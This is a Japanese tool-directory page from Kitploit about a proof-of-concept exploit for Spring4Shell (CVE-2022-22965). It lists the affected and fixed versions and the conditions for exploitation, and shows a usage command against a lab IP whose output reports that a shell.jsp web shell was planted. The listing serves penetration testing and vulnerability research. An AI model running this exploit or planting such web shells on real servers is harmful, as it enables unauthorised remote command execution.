Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-22965 — Spring4Shell | Kitploit
ツール/GitHubGitHub/nhattanhh/cve-2022-22965
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubnhattanhh/cve-2022-22965

CVE-2022-22965

Spring4Shell

リポジトリを見る
8ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-22965 Spring4Shell-PoC

バージョン

  • Spring Framework < 5.2.20 および 5.3.18

修正バージョン:

  • Spring Framework 5.3.18 および 5.2.20

  • Spring Boot 2.6.6 および 2.5.12

詳細

  • Spring Core は Spring Framework のコアコンポーネントです。これは Spring MVC、Spring Boot、Spring WebFlux など、Spring Framework エコシステム内の他のコンポーネントを構築するための基盤です。エクスプロイトコードは以下の条件下で実行可能です。

    • JDK 9 以上

    • Apache Tomcat がサーブレットコンテナを実行している

    • WAR パッケージ

    • パッケージ依存関係: spring-webmvc または spring-webflux

  • アプリケーションがデフォルトのように Spring Boot 実行可能 jar ファイルとしてデプロイされている場合、このセキュリティ上の欠陥の影響を受けません。

エクスプロイト:

root@kitploit:~
python CVE-2022-22965.py --url http://172.16.1.10:8080/helloworld/greeting

結果:

root@kitploit:~
└─$ python cve-spring4shell.py --url http://172.16.1.10:8080/helloworld/greeting
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://172.16.1.10:8080/shell.jsp?cmd=id
ツールをダウンロード